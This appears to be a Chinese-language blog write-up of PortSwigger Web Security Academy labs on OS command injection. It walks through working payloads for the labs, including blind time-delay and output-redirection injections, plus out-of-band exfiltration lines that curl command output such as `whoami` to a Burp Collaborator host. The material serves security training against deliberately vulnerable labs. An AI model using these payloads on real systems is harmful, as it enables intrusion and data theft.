Portswigger web security academy:OS command injection

OS command injection, simple case

  • 题目描述

    • 环境中的web应用运行了一个包含产品和店铺id的命令行,并且会返回命令执行结果

    • 要求运行whoami来确认当前用户身份

  • 解题过程

    • 先找注入点

      找到注入点在选地区,查剩余库存的功能点(check stock)

    • 注入

      burp拦截,productId=3%26echo 123&storeId=2

      返回123 2,说明存在命令注入

    • 构造payload

      productId=3%26whoami&storeId=2,报错,提示多余的操作符2,emmmm,说明会进行2也拼接到了语句里

      修改productId=3%26whoami%26echo &storeId=2

Blind OS command injection with time delays

  • 题目描述

    • feedback功能中有命令注入(盲注):用户输入会被执行,但没有返回

    • 要求产生10秒的延时

  • 解题过程

    • 先去搜索了一下linux下的延迟命令

      • 找到一个 sleep num[s/m/h/d]

    • 用burp抓包,经过测试,发现email参数异常,当其中包含有& | ; %0a ` 或者它们的url编码时会返回Could not save

      • 在没有思路的时候,我返回去看了下第一题,发现最后参数处理不好,会产生报错,猜测这里也有报错,需要把前后参数都拼接好才行

    • 尝试

      • |sleep%2010s|

        仍然报错,但是可以看到命令已经成功运行,猜测是管道符|导致的参数错误

      • 再次尝试,||sleep%20100s||,成功且没有报错

Blind OS command injection with out put redirection

  • 题目描述

    • feedback功能点存在命令注入(盲注)
    • /var/www/images/目录有可写权限,并且图片会被加载到商品详情页面
    • 要求把whoami的结果重定向到上述目录,并拿到结果

  • 解题过程

    • 寻找打开图片的接口

      • /image?filename=xx.jpg

    • 寻找漏洞点

      使用上一题的payload,发现漏洞点仍然在email

    • 构造payload并执行

      ||whoami%20>/var/www/images/1.jpg||

    • 利用图片接口,获得结果

Blind OS command injection with out-of-band interaction

  • 题目描述

    • feedback功能点存在命令注入(盲注)
    • 输入的命令会异步执行,从返回中不会得到任何信息,并且无法将结果重定向到可以访问到的目录,但可以使用外带(out-of-band)
    • 要求执行一个DNS lookup,(利用 collaborator

  • 解题过程

    • 直接构造payload

      ||curl%20xxx.burpcollaborator.net||即可

      但是它没有回显,感觉不舒服,于是乎尝试了一下通过参数拼接来获得命令运行结果

      最终的payload:||a=whoami;curl%20"xxx.burpcollaborator.net/"`$a`||

      在尝试&和yt交流之后,发现以下payload也可以:

      • a=whoami;curl xxx.xxx/`$a`

      • a=`whoami`;curl xxx.xxx/$a

      curl xxx.xxx/`whoami` 这样最简单

Blind OS command injection with out-of-band data exfiltration

  • 题目描述

    • feedback功能点存在命令注入(盲注)
    • 输入的命令会异步执行,从返回中不会得到任何信息,并且无法将结果重定向到可以访问到的目录,但可以使用外带(out-of-band)得到结果
    • 要求通过外带获得当前用户名(这不就是我上道题最后做的吗)

  • 解题过程

    • 直接用上道题最后的payload即可

      ||a=whoami;curl%20xxx.burpcollaborator.net/`$a`||

      (更新)||curl%20xxx.burpcollaborator.net/`whoami`||

Portswigger web security academy:OS command injection的更多相关文章

  1. Portswigger web security academy:Server-side template injection(SSTI)

    Portswigger web security academy:Server-side template injection(SSTI) 目录 Portswigger web security ac ...

  2. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

  3. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  4. Portswigger web security academy:WebSockets

    Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...

  5. Portswigger web security academy:Clickjacking (UI redressing)

    Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...

  6. Portswigger web security academy:Cross-origin resource sharing (CORS)

    Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...

  7. Portswigger web security academy:Cross-site request forgery (CSRF)

    Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...

  8. Portswigger web security academy:OAth authentication vulnerable

    Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...

  9. Portswigger web security academy:Server-side request forgery (SSRF)

    Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...

随机推荐

  1. mysql查询较长的执行进程及创建权限账号

    A:对于死锁,进程的操作 1.查找当前活跃事务 SELECT * from information_schema.INNODB_TRX 根据trx_started等判断事务是否异常锁定 2.杀死线程 ...

  2. Java基础:重文本markdown

    说一说markdown 前言 在系统学习Java等开发语言之前,我们应该养成写"日记"的习惯,也就是写博客:写博客的地方有博客园,csdn等.而写博客又得知道markdown重文本 ...

  3. 从零学脚手架(六)---production和development拆分

    development.production拆分 根据文件拆分 webpack打包时分为开发模式(development)和发布模式(production),在前面使用命令参数做了简单区分. 但这种方 ...

  4. linux中c语言编程main函数和参数

    linux下main函数的的标准调用函数的标准形式 int main(int char,char *argv[]) 在main函数的两个参数中,argc必须是整型变量,其是命令行的参数的数目,argv ...

  5. 050_Servlet详解

    目录 Servlet Servlet简介 HelloServlet Servlet原理 servlet-mapping Servlet请求路径 ServletContext Servlet上下文 Se ...

  6. P1036_选数(JAVA语言)

    题目描述 已知 n 个整数x1​,x2​,-,xn​,以及1个整数k(k<n).从n个整数中任选k个整数相加,可分别得到一系列的和.例如当n=4,k=3,4个整数分别为3,7,12,19时,可得 ...

  7. 想了解FlinkX-Oracle Logminer?那就不要错过这篇文章

    FlinkX-Oracle Logminer模块是FlinkX基于Logminer对Oracle重做日志进行实时采集分析,可对Oracle进行实时同步也可以通过指定SCN或者时间戳从某个节点进行同步, ...

  8. wrf模拟的domain图绘制

    wrf模拟的区域绘制,domain图,利用python的cartopy库绘制模拟区域 参考Liang Chen的draw_wrf_domian.py这个代码, 出处python画wrf模式的模拟区域 ...

  9. 基于Hive进行数仓建设的资源元数据信息统计:Hive篇

    在数据仓库建设中,元数据管理是非常重要的环节之一.根据Kimball的数据仓库理论,可以将元数据分为这三类: 技术元数据,如表的存储结构结构.文件的路径 业务元数据,如血缘关系.业务的归属 过程元数据 ...

  10. tasker支持的shell 命令大全

    参考 http://www.notenoughtech.com/tasker/tasker-run-shell-commands/   罗列所有系统配置项 settings list system s ...